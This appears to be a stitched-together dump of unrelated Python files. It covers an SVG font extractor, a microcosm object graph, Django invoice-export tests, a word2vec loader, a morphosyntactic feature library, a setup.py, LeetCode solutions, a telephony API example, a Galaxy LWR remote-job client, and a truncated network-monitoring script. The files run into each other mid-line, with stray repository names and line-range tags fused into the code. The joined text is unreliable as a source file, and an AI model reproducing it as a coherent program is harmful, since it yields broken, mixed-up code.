parser.add_argument('--source_dir', dest='source_dir', action='store', default=SOURCE_DIR, help="The directory containing the source files.") parser.add_argument('--output_file', dest='output_file', action='store', default=OUTPUT_FILE, help="The file listing the fonts.") parser.add_argument('--version', action='version', version='%(prog)s '+VERSION) arguments = parser.parse_args() # Update Flags SOURCE_DIR = arguments.source_dir OUTPUT_FILE = arguments.output_file combo = {} allnames = set([]) pattern = re.compile(r"font-family(:|=)['\"]?([^;>'\"]*)") # Recursively find all SVGs in SOURCE_DIR SVGs = subprocess.run(["find", SOURCE_DIR, "-type", "f", "-name", "*.svg"], stdout=subprocess.PIPE, universal_newlines=True)\ .stdout.strip().split(sep="\n") for s in SVGs: if len(s) == 0: continue results = set([]) with open(s, 'r', encoding="utf-8") as s_file: for line in s_file: match = pattern.search(line) if match: stripped = match.group(2).strip().strip('"').strip("'").strip() if stripped: results.add(stripped) if len(results): combo[s] = results for n in results: allnames.add(n) with open(arguments.output_file, 'w') as fontlist_file: # pretty print keys = sorted(combo.keys()) allfonts = [{'all' : sorted(list(allnames))}] tree = [{i : list(combo[i])} for i in keys] print(json.dumps(allfonts+tree), file=fontlist_file) """ The object graph is the core unit of microcosm-based applications. Object graphs wire together independently defined `components` using a set of factory functions and application configuration. Components are bound to the graph lazily (or via `graph.use()`) and are cached for reuse. """ from contextlib import contextmanager from typing import Any, Iterable, Tuple from microcosm.caching import create_cache from microcosm.config.api import configure from microcosm.constants import RESERVED from microcosm.errors import CyclicGraphError, LockedGraphError from microcosm.hooks import invoke_resolve_hook from microcosm.loaders import load_from_environ from microcosm.metadata import Metadata from microcosm.profile import NoopProfiler from microcosm.registry import _registry class ObjectGraph: """ An object graph contains all of the instantiated components for a microservice. Because components can reference each other acyclically, this collection of components forms a directed acyclic graph. """ def __init__(self, metadata, config, registry, profiler, cache, loader): self.metadata = metadata self.config = config self._locked = False self._registry = registry self._profiler = profiler self._cache = cache self.loader = loader def use(self, *keys): """ Explicitly initialize a set of components by their binding keys. """ return [ getattr(self, key) for key in keys ] def assign(self, key, value): """ Explicitly assign a graph binding to a value. In general, graph values should only be derived from registered factories and the graph should not be assigned to; however, there can be exceptions including testing and "virtual" bindings, so assign can be used when circumventing setattr. """ self._cache[key] = value return value def lock(self): """ Lock the graph so that new components cannot be created. """ self._locked = True return self def unlock(self): """ Unlock the graph so that new components can created. """ self._locked = False return self def factory_for(self, key): return self._registry.resolve(key) def get(self, key): return self._cache.get(key) def __getattr__(self, key): """ Access a component by its binding key. If the component is not present, it will be lazily created. :raises CyclicGraphError: if the factory function requires a cycle :raises LockedGraphError: if the graph is locked """ try: component = self._cache[key] if component is RESERVED: raise CyclicGraphError(key) return component except KeyError: pass if self._locked: raise LockedGraphError(key) return self._resolve_key(key) def __setattr__(self, key, value): if not key.startswith("_") and key not in ("metadata", "config", "loader"): raise Exception("Cannot setattr on ObjectGraph for key: {}".format(key)) super(ObjectGraph, self).__setattr__(key, value) @contextmanager def _reserve(self, key): """ Reserve a component's binding temporarily. Protects against cycles. """ self.assign(key, RESERVED) try: yield finally: del self._cache[key] def _resolve_key(self, key): """ Attempt to lazily create a component. :raises NotBoundError: if the component does not have a bound factory :raises CyclicGraphError: if the factory function requires a cycle :raises LockedGraphError: if the graph is locked """ with self._reserve(key): factory = self.factory_for(key) with self._profiler(key): component = factory(self) invoke_resolve_hook(component) return self.assign(key, component) def items(self) -> Iterable[Tuple[str, Any]]: """ Iterates over tuples of (key, component) for all bound components. """ yield from self._cache.items() __getitem__ = __getattr__ def create_object_graph(name, debug=False, testing=False, import_name=None, root_path=None, loader=load_from_environ, registry=_registry, profiler=None, cache=None): """ Create a new object graph. :param name: the name of the microservice :param debug: is development debugging enabled? :param testing: is unit testing enabled? :param loader: the configuration loader to use :param registry: the registry to use (defaults to the global) """ metadata = Metadata( name=name, debug=debug, testing=testing, import_name=import_name, root_path=root_path, ) defaults = registry.defaults config = configure(defaults, metadata, loader) if profiler is None: profiler = NoopProfiler() if cache is None or isinstance(cache, str): cache = create_cache(cache) return ObjectGraph( metadata=metadata, config=config, registry=registry, profiler=profiler, cache=cache, loader=loader, ) import datetime import json from decimal import Decimal import pytest from django.core import mail from laske_export.enums import LaskeExportLogInvoiceStatus from laske_export.exporter import LaskeExporter from laske_export.management.commands import send_invoices_to_laske from laske_export.models import LaskeExportLog from leasing.enums import ContactType @pytest.fixture(scope="session") def monkeypatch_session(request): """Experimental (https://github.com/pytest-dev/pytest/issues/363).""" from _pytest.monkeypatch import MonkeyPatch mpatch = MonkeyPatch() yield mpatch mpatch.undo() @pytest.fixture def monkeypatch_laske_exporter_send(monkeypatch_session): def laske_exporter_send(self, filename): pass monkeypatch_session.setattr(LaskeExporter, "send", laske_exporter_send) laske_exporter_send_with_error__error_message = "Unexpected error!" @pytest.fixture def monkeypatch_laske_exporter_send_with_error(monkeypatch_session): def laske_exporter_send(self, filename): raise Exception(laske_exporter_send_with_error__error_message) monkeypatch_session.setattr(LaskeExporter, "send", laske_exporter_send) @pytest.fixture def billing_period(): billing_period_start_date = datetime.date(year=2017, month=7, day=1) billing_period_end_date = datetime.date(year=2017, month=12, day=31) return billing_period_start_date, billing_period_end_date @pytest.fixture def lease(lease_factory): lease = lease_factory( type_id=1, municipality_id=1, district_id=5, notice_period_id=1 ) return lease @pytest.fixture def invoice(contact_factory, invoice_factory, lease, billing_period): billing_period_start_date, billing_period_end_date = billing_period contact = contact_factory( name="Company", type=ContactType.BUSINESS, business_id="1234567-8", ) invoice = invoice_factory( lease=lease, total_amount=Decimal("123.45"), billed_amount=Decimal("123.45"), outstanding_amount=Decimal("123.45"), recipient=contact, billing_period_start_date=billing_period_start_date, billing_period_end_date=billing_period_end_date, ) return invoice @pytest.fixture def broken_invoice(contact_factory, invoice_factory, lease, billing_period): billing_period_start_date, billing_period_end_date = billing_period broken_contact = contact_factory( name="Broken Company", type=ContactType.BUSINESS, business_id="1234567-89", # Incorrect business id ) broken_invoice = invoice_factory( lease=lease, total_amount=Decimal("123.45"), billed_amount=Decimal("123.45"), outstanding_amount=Decimal("123.45"), recipient=broken_contact, billing_period_start_date=billing_period_start_date, billing_period_end_date=billing_period_end_date, ) return broken_invoice @pytest.fixture def send_invoices_to_laske_command(): command = send_invoices_to_laske.Command() return command @pytest.fixture def send_invoices_to_laske_command_handle( broken_invoice, invoice, send_invoices_to_laske_command, monkeypatch_laske_exporter_send, ): command = send_invoices_to_laske_command command.handle() @pytest.fixture def send_invoices_to_laske_command_handle_with_unexpected_error( broken_invoice, invoice, send_invoices_to_laske_command, monkeypatch_laske_exporter_send_with_error, ): command = send_invoices_to_laske_command command.handle() @pytest.fixture def land_use_agreement_invoice( contact_factory, land_use_agreement_invoice_factory, land_use_agreement_test_data ): contact = contact_factory( name="Company", type=ContactType.BUSINESS, business_id="1234567-8", ) invoice = land_use_agreement_invoice_factory( land_use_agreement=land_use_agreement_test_data, total_amount=Decimal("123.45"), recipient=contact, ) return invoice @pytest.mark.django_db def test_invalid_export_invoice( broken_invoice, invoice, land_use_agreement_invoice, monkeypatch_laske_exporter_send ): exporter = LaskeExporter() exporter.export_invoices([broken_invoice, invoice]) exporter.export_land_use_agreement_invoices([land_use_agreement_invoice]) logs = LaskeExportLog.objects.all() assert logs.count() == 2 log = logs[1] assert log.invoices.count() == 2 log_items = log.laskeexportloginvoiceitem_set.all() assert log_items.count() == 2 failed_invoice_logs = log_items.filter(status=LaskeExportLogInvoiceStatus.FAILED) assert failed_invoice_logs.count() == 1 failed_invoice_log = failed_invoice_logs[0] assert failed_invoice_log.status == LaskeExportLogInvoiceStatus.FAILED error_json = json.loads(failed_invoice_log.information) assert "customer_yid" in error_json sent_invoice_logs = log_items.filter(status=LaskeExportLogInvoiceStatus.SENT) assert sent_invoice_logs.count() == 1 @pytest.mark.django_db def test_send_invoices_to_laske_command_handle( broken_invoice, send_invoices_to_laske_command_handle ): broken_invoice.refresh_from_db() assert len(mail.outbox) == 1 export_mail = mail.outbox[0] assert "Failed" in export_mail.body assert ( "#{} ({})".format(broken_invoice.number, broken_invoice.lease.identifier) in export_mail.body ) @pytest.mark.django_db def test_send_invoices_to_laske_command_handle_with_unexpected_error( send_invoices_to_laske_command_handle_with_unexpected_error, ): assert len(mail.outbox) == 1 export_mail = mail.outbox[0] assert "X-Priority" in export_mail.extra_headers assert export_mail.extra_headers["X-Priority"] == "1" # High assert laske_exporter_send_with_error__error_message in export_mail.body #! /usr/bin/env python3 # -*- coding:utf-8 -*- from paths import all_poems_w2v_model_path, emotion_poem_corpus from gensim import models from poems import Poems from segment import Segmenter import os def _gen_word_model(): segment = Segmenter() poems = Poems(emotion_poem_corpus) poems_data = [] for poem in poems: poem_data = [] for sentence in poem: poem_data.extend(segment.segment(sentence)) poems_data.append(poem_data) model = models.Word2Vec(poems_data, size = 512) model.save(all_poems_w2v_model_path) def get_model(mode = 'word', content = 'all'): if mode == 'word' and content == 'all': if not os.path.exists(all_poems_w2v_model_path): _gen_word_model() model = models.Word2Vec.load(all_poems_w2v_model_path) return modeldmengine/features.py1-10 # features.py - sets and bags of morphosyntactic features """Sets and multisets of predefined feature values.""" import collections from itertools import chain, groupby import operator from dmengine.vendor import oset from . import meta from . import tools __all__ = ['FeatureSystem', 'FeatureSet', 'FeatureBag'] # TODO: refactor this module class FeatureMeta(type): """Retrieve from last created feature system as default.""" system = None def __call__(self, value=None): # noqa: N804 if value: key = self.system.get_key(value) self = self.system.mapping[key] return super().__call__() class Feature(metaclass=FeatureMeta): """Hideable morphosyntactic feature.""" __slots__ = ('visible',) def __init__(self, visible=True): self.visible = visible def __nonempty__(self): return self.visible def __eq__(self, other): return self.__class__ is other.__class__ def __ne__(self, other): return self.__class__ is not other.__class__ def __hash__(self): return hash(self.__class__) def __repr__(self): hidden = '' if self.visible else 'hidden ' category = ' ' + self.category if self.category else '' return f'<{hidden}{self.value}{category} feature>' def __str__(self): return self.value if self.visible else f'_self.value_' def hide(self): if not self.visible: raise ValueError(f'Unable to hide {self!r}.') self.visible = False class FeatureSetMeta(type): system = None def __call__(self, values, *, sortkey=operator.attrgetter('index')): # noqa: N804 if isinstance(values, self): return values.copy() if isinstance(values, str): values = values.replace(',', ' ').split() keys = map(self.system.get_key, values) features = (f() for f in map(self.system.mapping.__getitem__, keys)) features = sorted(features, key=sortkey) return super().__call__(features) @meta.serializable class FeatureSet(metaclass=FeatureSetMeta): """Ordered set of morphosyntactic features.""" features = oset.oset @staticmethod def _multi_representer(dumper, self): return dumper.represent_sequence('tag:yaml.org,2002:seq', self.values) @classmethod def from_features(cls, features): return super(cls.__class__, cls).__call__(features) @classmethod def from_featuresets(cls, featuresets): features = chain.from_iterable(fs.features for fs in featuresets) return cls.from_features(features) def __init__(self, features): self.features = self.features(features) def copy(self): return self.from_features(f.__class__() for f in self.features) def __repr__(self): values = ' '.join(self.values) return f'{self.__class__.__name__}({values!r})' def __str__(self): return ' '.join(map(str, self.features)) def __nonzero__(self): return bool(self.features) def __len__(self): return len(self.features) def issubset(self, other): return self.features <= other.features def issubset_visible(self, other): return self.features <= other.visible def hascommon(self, other): return not self.features.isdisjoint(other.features) def _clearlazy(self): attrs = self.__dict__ for name in ('values', 'visible', 'values_visible'): if name in attrs: del attrs[name] @meta.lazyproperty def values(self): return [f.value for f in self.features] @meta.lazyproperty def visible(self): return self.features.__class__(f for f in self.features if f.visible) @meta.lazyproperty def values_visible(self): return [f.value for f in self.features if f.visible] @property def by_category(self, *, groupkey=operator.attrgetter('category')): features = sorted(self.features, key=groupkey) mapping = {k: [f.value for f in g] for k, g in groupby(features, groupkey)} return [mapping.get(c, []) for c in self.__class__.system.categories] @property def by_specificity(self, *, groupkey=operator.attrgetter('specificity')): features = sorted(self.features, key=groupkey) mapping = {k: [f.value for f in g] for k, g in groupby(features, groupkey)} return [mapping.get(c, []) for c in self.__class__.system.specificities] def add(self, other): self._clearlazy() self.features |= other.features def remove(self, other, *, discard=False): if not discard and not other.features <= self.features: raise KeyError self._clearlazy() self.features -= other.features def consume(self, other): if not other.features <= self.features: raise KeyError self._clearlazy() for f in other.features & self.features: f.hide() class FeatureBag(FeatureSet): """Ordered bag of morphosyntactic features.""" features = list def issubset(self, other): return all(map(other.features.__contains__, self.features)) def issubset_visible(self, other): return all(map(other.visible.__contains__, self.features)) def hascommon(self, other): return any(map(other.features.__contains__, self.features)) def add(self, other): self._clearlazy() self.features += other.features def remove(self, other, *, discard=False): if not discard and not self.issubset(other): raise KeyError self._clearlazy() if discard: for f in other.features: try: self.features.remove(f) except ValueError: pass else: for f in other.features: self.features.remove(f) def consume(self, other): if not self.issubset(other): raise KeyError self._clearlazy() for f in other.features: for s in self.features: if s == f and s.visible: s.hide() break else: raise ValueError class FeatureSet(FeatureSet): """Ordered set or bag of morphosyntactic features.""" @meta.serializable class FeatureSystem(object): """Collection of defined morphosyntactic features values.""" Feature = Feature FeatureSet = FeatureSet FeatureBag = FeatureBag @staticmethod def _representer(dumper, self): result = [collections.OrderedDict([('value', f.value), ('category', f.category), ('specificity', f.specificity), ('name', f.name)]) for f in self.mapping.values()] return dumper.represent_sequence('tag:yaml.org,2002:seq', result) def __init__(self, features_kwargs=(), *, always_bag=False): class Feature(self.Feature): __slots__ = () system = self self.Feature = Feature self.mapping = collections.OrderedDict() for index, kwargs in enumerate(features_kwargs): f = self.create_feature(index, **kwargs) self.mapping[f.key] = f if not len(self.mapping) == len(features_kwargs): raise ValueError(f'{self!r} no uniqueness.') self.specificities = sorted({f.specificity for f in self.mapping.values()}, reverse=True) self.categories = tools.uniqued(f.category for f in self.mapping.values()) class FeatureSet(self.FeatureSet): system = self class FeatureBag(self.FeatureBag): system = self self.FeatureSet = FeatureSet self.FeatureBag = FeatureBag FeatureMeta.system = FeatureSetMeta.system = self self.always_bag = bool(always_bag) if always_bag: # change the base of already referenced class FeatureSet.__bases__ = (FeatureBag,) FeatureSet.__name__ = 'FeatureBag' def __len__(self): return len(self.mapping) def __iter__(self): return iter(self.mapping.values()) def __getitem__(self, index): return list(self.mapping.values())[index] _tdrop = ' ,;' _trans = (str.maketrans('', '', _tdrop),) @staticmethod def create_value(value, _trans=_trans): if isinstance(value, int): return f'{value:+d}' return str(value).translate(*_trans) @staticmethod def get_key(value): return str(value).lower().lstrip('+') def create_feature(self, index, value, category=None, specificity=0, name=None): value = self.create_value(value) if not value: raise ValueError(f'{self!r} empty value.') name = str(name).title() if name else self.derive_name(value) class Feature(self.Feature): __slots__ = () Feature.__name__ = f'{name}Feature' Feature.name = name Feature.index = int(index) Feature.key = self.get_key(value) Feature.value = value Feature.category = str(category).lower() if category else '' Feature.specificity = int(specificity) return Feature _derive_replaces = [[('+', 'plus'), ('-', 'minus')], [('1', 'first'), ('2', 'second'), ('3', 'third')], [('sg', 'singular'), ('du', 'dual'), ('pl', 'plural')]] @classmethod def derive_name(cls, value): parts = [] for srpl in cls._derive_replaces: for s, r in srpl: if value.startswith(s): value = value[len(s):] parts.append(r) break parts.append(value) return ''.join(p.title() for p in parts) """ Description: Contains all the configuration for the package on pip """ import setuptools def get_content(*filename): """ Gets the content of a file and returns it as a string Args: filename(str): Name of file to pull content from Returns: str: Content from file """ content = "" for current_file in filename: with open(current_file, encoding="utf8") as full_description: content += full_description.read() return content setuptools.setup( name = "otp_emoji", version = "1.3.0", author = "", author_email = "", description = "Used to generate 🙊 one-time pads 🤐 exclusively in emojis.", long_description = get_content("README.md", "CHANGELOG.md"), long_description_content_type = "text/markdown", url = "https://github.com/Descent098/otp_emoji", include_package_data = True, install_requires=["docopt"], py_modules=["otp_emoji"], entry_points = { 'console_scripts': ['otp_emoji = otp_emoji:main'] }, extras_require = { "dev" : [ "pytest", # Used to run the test code in the tests directory "pdoc3"], # Used to generate API documentation }, classifiers = [ "Programming Language :: Python :: 3", "Operating System :: OS Independent", ], ) rakhi2001/ecom7 __________________________________________________________________________________________________ sample 128 ms submission class Solution: def maxDistToClosest(self, seats: List[int]) -> int: right, left = 0, 0 while seats[left]==0: left+=1 idx = len(seats)-1 while seats[idx]==0: idx -= 1 right +=1 max_, zero = 0, 0 for i in seats: if i == 0: zero += 1 if zero > max_: max_ = zero else: zero = 0 return max([left, right, int(max_/2+0.5)]) __________________________________________________________________________________________________ sample 13144 kb submission class Solution: def maxDistToClosest(self, seats: List[int]) -> int: first, last, prev = -1, -1, -1 ans = 0 for i in range(len(seats)): if seats[i] != 1: continue if prev != -1: ans = max(ans, (i - prev) // 2) elif first == -1: first = i if last < i: last = i prev = i return max(ans, max(first, len(seats) - 1 - last)) __________________________________________________________________________________________________ # Example: List Calls call_list = api.list_calls(to = '+19192223333', size = 2) print(list(call_list)) ## [ ## { ## 'activeTime' : '2017-01-26T16:10:23Z', ## 'callbackUrl' : 'http://yoursite.com/calls', ## 'chargeableDuration' : 60, ## 'direction' : 'out', ## 'endTime' : '2017-01-26T16:10:33Z', ## 'events' : 'https://api.catapult.inetwork.com/v1/users/u-abc123/calls/c-abc123/events', ## 'from' : '+17079311113', ## 'id' : 'c-abc123', ## 'recordingEnabled' : False, ## 'recordingFileFormat' : 'wav', ## 'recordings' : 'https://api.../v1/users/u-abc123/calls/c-abc123/recordings', ## 'startTime' : '2017-01-26T16:10:11Z', ## 'state' : 'completed', ## 'to' : '+19192223333', ## 'transcriptionEnabled': False, ## 'transcriptions' : 'https://api.../v1/users/u-abc123/calls/c-abc123/transcriptions' ## }, ## { ## 'activeTime' : '2016-12-29T23:50:35Z', ## 'chargeableDuration' : 60, ## 'direction' : 'out', ## 'endTime' : '2016-12-29T23:50:41Z', ## 'events' : 'https://api.catapult.inetwork.com/v1/users/u-abc123/calls/c-xyz987/events', ## 'from' : '+19194443333', ## 'id' : 'c-xyz987', ## 'recordingEnabled' : False, ## 'recordingFileFormat' : 'wav', ## 'recordings' : 'https://api.../v1/users/u-abc123/calls/c-xyz987/recordings', ## 'startTime' : '2016-12-29T23:50:15Z', ## 'state' : 'completed', ## 'to' : '+19192223333', ## 'transcriptionEnabled': False, ## 'transcriptions' : 'https://api.../v1/users/u-abc123/calls/c-xyz987/transcriptions' ## } ## ] thata/galaxy-dist """ lwr_client ========== This module contains logic for interfacing with an external LWR server. """ import mmap import os import re import time import urllib import urllib2 import simplejson class JobInputs(object): """ Abstractions over dynamic inputs created for a given job (namely the command to execute and created configfiles). **Parameters** command_line : str Local command to execute for this job. (To be rewritten.) config_files : str Config files created for this job. (To be rewritten.) >>> import tempfile >>> tf = tempfile.NamedTemporaryFile() >>> def setup_inputs(tf): ... open(tf.name, "w").write("world /path/to/input the rest") ... inputs = JobInputs("hello /path/to/input", [tf.name]) ... return inputs >>> inputs = setup_inputs(tf) >>> inputs.rewrite_paths("/path/to/input", 'C:\\input') >>> inputs.rewritten_command_line 'hello C:\\\\input' >>> inputs.rewritten_config_files[tf.name] 'world C:\\\\input the rest' >>> tf.close() >>> tf = tempfile.NamedTemporaryFile() >>> inputs = setup_inputs(tf) >>> inputs.find_referenced_subfiles('/path/to') ['/path/to/input'] >>> inputs.path_referenced('/path/to') True >>> inputs.path_referenced('/path/to/input') True >>> inputs.path_referenced('/path/to/notinput') False >>> tf.close() """ def __init__(self, command_line, config_files): self.rewritten_command_line = command_line self.rewritten_config_files = {} for config_file in config_files or []: config_contents = _read(config_file) self.rewritten_config_files[config_file] = config_contents def find_referenced_subfiles(self, directory): """ Return list of files below specified `directory` in job inputs. Could use more sophisticated logic (match quotes to handle spaces, handle subdirectories, etc...). **Parameters** directory : str Full path to directory to search. """ pattern = r"(%s%s\S+)" % (directory, os.sep) referenced_files = set() for input_contents in self.__items(): referenced_files.update(re.findall(pattern, input_contents)) return list(referenced_files) def path_referenced(self, path): pattern = r"%s" % path found = False for input_contents in self.__items(): if re.findall(pattern, input_contents): found = True break return found def rewrite_paths(self, local_path, remote_path): """ Rewrite references to `local_path` with `remote_path` in job inputs. """ self.__rewrite_command_line(local_path, remote_path) self.__rewrite_config_files(local_path, remote_path) def __rewrite_command_line(self, local_path, remote_path): self.rewritten_command_line = self.rewritten_command_line.replace(local_path, remote_path) def __rewrite_config_files(self, local_path, remote_path): for config_file, rewritten_contents in self.rewritten_config_files.iteritems(): self.rewritten_config_files[config_file] = rewritten_contents.replace(local_path, remote_path) def __items(self): items = [self.rewritten_command_line] items.extend(self.rewritten_config_files.values()) return items class FileStager(object): """ Objects of the FileStager class interact with an LWR client object to stage the files required to run jobs on a remote LWR server. **Parameters** client : Client LWR client object. command_line : str The local command line to execute, this will be rewritten for the remote server. config_files : list List of Galaxy 'configfile's produced for this job. These will be rewritten and sent to remote server. input_files : list List of input files used by job. These will be transferred and references rewritten. output_files : list List of output_files produced by job. tool_dir : str Directory containing tool to execute (if a wrapper is used, it will be transferred to remote server). working_directory : str Local path created by Galaxy for running this job. """ def __init__(self, client, command_line, config_files, input_files, output_files, tool_dir, working_directory): """ """ self.client = client self.command_line = command_line self.config_files = config_files self.input_files = input_files self.output_files = output_files self.tool_dir = os.path.abspath(tool_dir) self.working_directory = working_directory # Setup job inputs, these will need to be rewritten before # shipping off to remote LWR server. self.job_inputs = JobInputs(self.command_line, self.config_files) self.file_renames = {} self.__handle_setup() self.__initialize_referenced_tool_files() self.__upload_tool_files() self.__upload_input_files() self.__upload_working_directory_files() self.__initialize_output_file_renames() self.__initialize_task_output_file_renames() self.__initialize_config_file_renames() self.__handle_rewrites() self.__upload_rewritten_config_files() def __handle_setup(self): job_config = self.client.setup() self.new_working_directory = job_config['working_directory'] self.new_outputs_directory = job_config['outputs_directory'] self.remote_path_separator = job_config['path_separator'] # If remote LWR server assigned job id, use that otherwise # just use local job_id assigned. galaxy_job_id = self.client.job_id self.job_id = job_config.get('job_id', galaxy_job_id) if self.job_id != galaxy_job_id: # Remote LWR server assigned an id different than the # Galaxy job id, update client to reflect this. self.client.job_id = self.job_id def __initialize_referenced_tool_files(self): self.referenced_tool_files = self.job_inputs.find_referenced_subfiles(self.tool_dir) def __upload_tool_files(self): for referenced_tool_file in self.referenced_tool_files: tool_upload_response = self.client.upload_tool_file(referenced_tool_file) self.file_renames[referenced_tool_file] = tool_upload_response['path'] def __upload_input_files(self): for input_file in self.input_files: self.__upload_input_file(input_file) self.__upload_input_extra_files(input_file) def __upload_input_file(self, input_file): if self.job_inputs.path_referenced(input_file): input_upload_response = self.client.upload_input(input_file) self.file_renames[input_file] = input_upload_response['path'] def __upload_input_extra_files(self, input_file): # TODO: Determine if this is object store safe and what needs to be # done if it is not. files_path = "%s_files" % input_file[0:-len(".dat")] if os.path.exists(files_path) and self.job_inputs.path_referenced(files_path): for extra_file in os.listdir(files_path): extra_file_path = os.path.join(files_path, extra_file) relative_path = os.path.basename(files_path) extra_file_relative_path = os.path.join(relative_path, extra_file) response = self.client.upload_extra_input(extra_file_path, extra_file_relative_path) self.file_renames[extra_file_path] = response['path'] def __upload_working_directory_files(self): # Task manager stages files into working directory, these need to be # uploaded if present. for working_directory_file in os.listdir(self.working_directory): path = os.path.join(self.working_directory, working_directory_file) working_file_response = self.client.upload_working_directory_file(path) self.file_renames[path] = working_file_response['path'] def __initialize_output_file_renames(self): for output_file in self.output_files: self.file_renames[output_file] = r'%s%s%s' % (self.new_outputs_directory, self.remote_path_separator, os.path.basename(output_file)) def __initialize_task_output_file_renames(self): for output_file in self.output_files: name = os.path.basename(output_file) self.file_renames[os.path.join(self.working_directory, name)] = r'%s%s%s' % (self.new_working_directory, self.remote_path_separator, name) def __initialize_config_file_renames(self): for config_file in self.config_files: self.file_renames[config_file] = r'%s%s%s' % (self.new_working_directory, self.remote_path_separator, os.path.basename(config_file)) def __rewrite_paths(self, contents): new_contents = contents for local_path, remote_path in self.file_renames.iteritems(): new_contents = new_contents.replace(local_path, remote_path) return new_contents def __handle_rewrites(self): for local_path, remote_path in self.file_renames.iteritems(): self.job_inputs.rewrite_paths(local_path, remote_path) def __upload_rewritten_config_files(self): for config_file, new_config_contents in self.job_inputs.rewritten_config_files.iteritems(): self.client.upload_config_file(config_file, new_config_contents) def get_rewritten_command_line(self): """ Returns the rewritten version of the command line to execute suitable for remote host. """ return self.job_inputs.rewritten_command_line class Client(object): """ Objects of this client class perform low-level communication with a remote LWR server. **Parameters** remote_host : str Remote URL of the LWR server. job_id : str Galaxy job/task id. private_key : str (optional) Secret key the remote LWR server is configured with. """ def __init__(self, remote_host, job_id, private_key=None): if not remote_host.endswith("/"): remote_host = remote_host + "/" ## If we don't have an explicit private_key defined, check for ## one embedded in the URL. A URL of the form ## https://moo@cow:8913 will try to contact https://cow:8913 ## with a private key of moo private_key_format = "https?://(.*)@.*/?" private_key_match = re.match(private_key_format, remote_host) if not private_key and private_key_match: private_key = private_key_match.group(1) remote_host = remote_host.replace("%s@" % private_key, '', 1) self.remote_host = remote_host self.job_id = job_id self.private_key = private_key def _url_open(self, request, data): return urllib2.urlopen(request, data) def __build_url(self, command, args): if self.private_key: args["private_key"] = self.private_key data = urllib.urlencode(args) url = self.remote_host + command + "?" + data return url def __raw_execute(self, command, args={}, data=None): url = self.__build_url(command, args) request = urllib2.Request(url=url, data=data) response = self._url_open(request, data) return response def __raw_execute_and_parse(self, command, args={}, data=None): response = self.__raw_execute(command, args, data) return simplejson.loads(response.read()) def __upload_file(self, action, path, name=None, contents=None): input = open(path, 'rb') try: mmapped_input = mmap.mmap(input.fileno(), 0, access=mmap.ACCESS_READ) return self.__upload_contents(action, path, mmapped_input, name) finally: input.close() def __upload_contents(self, action, path, contents, name=None): if not name: name = os.path.basename(path) args = {"job_id": self.job_id, "name": name} return self.__raw_execute_and_parse(action, args, contents) def upload_tool_file(self, path): """ Upload a tool related file (e.g. wrapper) required to run job. **Parameters** path : str Local path tool. """ return self.__upload_file("upload_tool_file", path) def upload_input(self, path): """ Upload input dataset to remote server. **Parameters** path : str Local path of input dataset. """ return self.__upload_file("upload_input", path) def upload_extra_input(self, path, relative_name): """ Upload extra input file to remote server. **Parameters** path : str Extra files path of input dataset corresponding to this input. relative_name : str Relative path of extra file to upload relative to inputs extra files path. """ return self.__upload_file("upload_extra_input", path, name=relative_name) def upload_config_file(self, path, contents): """ Upload a job's config file to the remote server. **Parameters** path : str Local path to the original config file. contents : str Rewritten contents of the config file to upload. """ return self.__upload_contents("upload_config_file", path, contents) def upload_working_directory_file(self, path): """ Upload the supplied file (path) from a job's working directory to remote server. **Parameters** path : str Path to file to upload. """ return self.__upload_file("upload_working_directory_file", path) def _get_output_type(self, name): return self.__raw_execute_and_parse("get_output_type", {"name": name, "job_id": self.job_id}) def download_work_dir_output(self, source, working_directory, output_path): """ Download an output dataset specified with from_work_dir from the remote server. **Parameters** source : str Path in job's working_directory to find output in. working_directory : str Local working_directory for the job. output_path : str Full path to output dataset. """ output = open(output_path, "wb") name = os.path.basename(source) self.__raw_download_output(name, self.job_id, "work_dir", output) def download_output(self, path, working_directory): """ Download an output dataset from the remote server. **Parameters** path : str Local path of the dataset. working_directory : str Local working_directory for the job. """ name = os.path.basename(path) output_type = self._get_output_type(name) if output_type == "direct": output = open(path, "wb") elif output_type == "task": output = open(os.path.join(working_directory, name), "wb") else: raise Exception("No remote output found for dataset with path %s" % path) self.__raw_download_output(name, self.job_id, output_type, output) def __raw_download_output(self, name, job_id, output_type, output_file): response = self.__raw_execute("download_output", {"name": name, "job_id": self.job_id, "output_type": output_type}) try: while True: buffer = response.read(1024) if buffer == "": break output_file.write(buffer) finally: output_file.close() def launch(self, command_line): """ Run or queue up the execution of the supplied `command_line` on the remote server. **Parameters** command_line : str Command to execute. """ return self.__raw_execute("launch", {"command_line": command_line, "job_id": self.job_id}) def kill(self): """ Cancel remote job, either removing from the queue or killing it. """ return self.__raw_execute("kill", {"job_id": self.job_id}) def wait(self): """ Wait for job to finish. """ while True: complete_response = self.raw_check_complete() if complete_response["complete"] == "true": return complete_response time.sleep(1) def raw_check_complete(self): """ Get check_complete response from the remote server. """ check_complete_response = self.__raw_execute_and_parse("check_complete", {"job_id": self.job_id}) return check_complete_response def check_complete(self): """ Return boolean indicating whether the job is complete. """ return self.raw_check_complete()["complete"] == "true" def clean(self): """ Cleanup the remote job. """ self.__raw_execute("clean", {"job_id": self.job_id}) def setup(self): """ Setup remote LWR server to run this job. """ return self.__raw_execute_and_parse("setup", {"job_id": self.job_id}) def _read(path): """ Utility method to quickly read small files (config files and tool wrappers) into memory as strings. """ input = open(path, "r") try: return input.read() finally: input.close() 1-10 # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Linux.RHEL.get_cdp_neighbors # --------------------------------------------------------------------- # Copyright (C) 2007-2017 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- """ ## CDP demon #### 1) "ladvd" see http://www.blinkenlights.nl/software/ladvd/ get ftp://ftp5.gwdg.de/pub/opensuse/repositories/home:/sten-blinkenlights/ # usermod -G ladvd -a 2) "llpdp" see http://vincentbernat.github.com/lldpd/ get http://software.opensuse.org/download.html?project=home:vbernat&package=lldpd usermod -G _lldpd -a enable CDP in /etc/sysconfig/lldpd : LLDPD_OPTIONS="-c" ## KVM host #### need drop CDP traffic ethX -- bridge -- vnetX dump CDP traffic # tcpdump -nn -v -i bond0 -s 1500 -c 100 'ether[20:2] == 0x2000' # iptables -I FORWARD -m mac --mac 01:00:0C:CC:CC:CC -j DROP """ from noc.core.script.base import BaseScript from noc.sa.interfaces.igetcdpneighbors import IGetCDPNeighbors import re class Script(BaseScript): name = "Linux.RHEL.get_cdp_neighbors" interface = IGetCDPNeighbors """ $ ladvdc -C -v Capability Codes: r - Repeater, B - Bridge, H - Host, R - Router, S - Switch, W - WLAN Access Point, C - DOCSIS Device, T - Telephone, O - Other Device ID Local Intf Proto Hold-time Capability Port ID gsw2-73-sar enp2s0 CDP 127 S Gi1/0/4 example.ru eth0 CDP 115 HRS 